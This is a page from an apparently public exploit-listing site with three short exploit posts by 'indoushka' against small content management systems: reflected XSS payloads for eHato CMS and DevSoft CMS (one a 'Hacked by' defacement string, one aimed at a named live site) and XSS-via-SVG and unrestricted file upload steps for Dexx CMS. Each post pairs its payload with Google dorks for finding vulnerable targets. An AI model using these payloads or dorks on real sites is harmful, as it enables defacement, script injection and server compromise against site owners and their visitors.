Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : eHato CMS 1.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://www.ehato.com | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2 [+] http://wtatcs.orgtw/news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2 Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Dexx CMS - HTML and Site Builder V2.2.3 Remote File Upload vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla Firefox 114.0.1 (64 bits) | | # Vendor : https://www.ezwsb.com/ | | # Dork : "Our award-winning templates are the most beautiful way to present your ideas online." | ==================================================================================================================================== [+] P0C : [+] The script is based on Laravel framework so you can apply the vulnerability for the framework https://dl.packetstormsecurity.net/2301-exploits/laravel9470-disclose.txt [-] XSS via file upload : [+] Dorking İn Google Or Other Search Enggine. [+] Register as a member of the target site . [+] After registering, log in and go to /account/settings . [+] path : https://127.0.0.1/storage/avatars/9SCDIW0ntFJYqaP9IfrOqhJfzNoyukqmbEOtJxH8.svg [-] Unrestricted File Upload : [+] Go to ( Dashboard/Projects/New)to create a new project or Choose a template for your project . [+] Choose Edit Image and upload your malicious file . [+] path : https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/ogSIFm8ztsQv4BBEy9Ci96utafSBsu45oe1RhL3y.htm https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/kNHGCajolk2LcxsEZq8Q5sGn9p7Pt7gO5nOO1zwz.txt https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/50otMfIHgIlJz3OFyuBMjeOSKaXs9a49YLZuaMlK.jpg https://127.0.0.1/storage/projects/26/7u3ps1joxTO0o1e3jZYfvb3klddh3GFzS1dh/images/kc4FLhcYIWBq7AhOHTpxWwjPxwKRe4vX8nmLBahh.php ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>====================================================================================================================================== | # Title : DevSoft Arge Bilişim CMS V1.0.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | | # Vendor : https://devsoft.com.tr/ | | # Dork : intext:''Web Yazılım: Devsoft'' | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /urunler.php?id=90'<marquee>Hacked by indoushka</marquee> [+] http://127.0.0.1/adabrokercomtr/urunler.php?id=90%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>